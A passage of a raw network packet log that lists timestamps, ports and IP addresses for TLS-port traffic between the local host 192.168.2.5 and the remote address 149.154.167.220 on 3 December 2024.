Dec 3, 2024 14:28:55.582365990 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.582384109 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.582401037 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.582416058 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.582420111 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.582453012 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.582465887 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.582567930 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.582580090 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.582636118 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.582643032 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.582695007 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.582710981 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.582726002 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.582735062 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.582775116 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.582783937 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.582813025 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.582822084 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.582865953 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.582875967 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.582884073 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.582897902 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.582912922 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.582998991 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.583045959 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.583091021 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.583149910 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.583933115 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.583956957 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.584062099 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.584084988 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.584112883 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.584177017 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.584203959 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.584213018 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.584326982 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.626974106 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.627031088 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.627178907 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.627212048 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.627296925 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.627331972 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.627378941 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.627432108 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.627484083 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.627546072 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.627640963 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.627688885 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.627715111 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.627788067 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.627878904 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.627928972 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.627974987 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.663098097 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.663167953 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.663172007 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.663284063 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.664618015 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.664727926 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.664763927 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.666589975 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.671329975 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.671653986 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.671708107 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.671722889 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.671735048 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.671757936 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.671792030 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.672439098 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.719336987 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.719974041 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.720144987 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.720799923 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.720865965 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.721060038 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.721194029 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.767328024 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.790783882 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.790990114 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.791585922 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.791707039 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.791807890 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.822916985 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.823349953 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.823376894 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.823426962 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.823584080 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.823641062 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.823695898 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.823744059 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.823786020 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.867328882 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.882136106 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.882189989 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.882260084 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.882303953 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.882417917 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.882464886 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.927345037 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.927776098 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.927865028 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.927944899 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.928034067 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.928107977 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.943902969 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.943928957 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.944044113 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.944051981 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.944231987 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.944248915 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.944315910 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.944458961 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.944531918 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.944551945 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.944566965 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.944626093 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.944669962 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.991332054 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.062104940 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.062222004 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.062268019 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.062289953 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.062329054 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.062345028 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.062567949 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.062678099 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.062684059 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.063920975 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.063998938 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.064074039 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.064086914 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.064106941 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.064116955 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.064121962 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.064201117 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.064218044 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.064260006 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.064279079 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.064296961 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.064307928 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.064354897 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.064399004 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.064415932 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.064455032 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.065551043 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.065613031 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.065643072 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.065660954 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.065665007 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.065671921 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.065684080 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.065712929 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.065850019 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.065860033 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.065876961 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.065939903 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.066026926 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.066076994 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.066148996 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.066170931 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.066361904 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.111330032 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.183948994 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.184043884 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.184063911 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.184087992 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.184163094 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.184189081 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.184200048 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.184273958 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.184478045 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.185807943 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.185822964 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.185889959 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.185908079 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.185935974 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.185964108 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.185981035 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.185988903 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.186007023 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.186078072 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.186269045 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.186394930 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.186532974 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.187527895 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.187580109 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.187681913 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.187683105 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.187707901 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.187783003 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.187800884 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.188746929 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.188843966 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.232234955 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.254205942 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.254229069 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.254276991 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.254409075 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.254476070 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.254530907 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.254590034 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.254601002 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.254673004 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.254692078 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.254719019 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.254746914 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.254777908 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.299336910 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.299813032 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.299915075 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.299976110 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.300024033 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.300060987 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.300105095 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.300134897 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.303406954 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.303478956 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.303517103 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.303536892 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.303602934 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.303695917 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.303746939 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.303792000 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.303905964 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.303922892 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.303968906 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.303986073 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.303997993 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.304709911 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.304792881 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.304809093 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.304894924 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.304907084 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.304945946 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.304991961 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.305032015 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.305074930 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.305128098 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.305157900 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.305188894 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.306365013 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.306438923 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.306468964 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.306492090 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.306497097 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.306515932 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.306638002 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.306652069 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.306696892 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.306760073 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.306813002 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.306870937 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.306919098 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.308052063 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.308064938 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.308151960 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.308160067 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.308185101 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.308234930 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.308255911 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.308264017 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.308275938 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.308355093 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.308413029 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.308446884 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.308479071 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.308624983 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.309464931 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.309484005 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.309544086 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.309572935 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.309597015 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.309598923 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.309628010 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.309649944 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.309659958 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.309701920 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.310261965 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.310336113 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.310368061 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.310496092 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.310818911 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.310858965 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.310944080 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.311024904 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.311041117 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.311110020 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.311120033 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.311201096 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.312211990 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.312269926 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.312330961 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.312349081 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.312405109 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.312434912 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.312484026 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.312527895 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.313611984 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.313692093 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.313720942 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.313740015 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.313755035 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.313779116 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.313787937 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.313863993 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.313921928 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.313972950 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.314022064 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.314069033 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.315011978 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.315079927 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.315109968 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.315133095 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.315151930 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.315182924 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.315217972 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.315280914 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.315335989 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.315376997 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.315402031 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.315546036 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.352236986 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.352256060 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.352348089 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.352412939 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.352452040 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.352489948 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.352591038 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.352655888 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.352705956 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.352745056 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.352902889 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.399333954 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.423271894 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.423381090 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.423398972 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.423424959 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:56.423492908 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:56.423518896 CET	49913	443	192.168.2.5	149.154.167.220
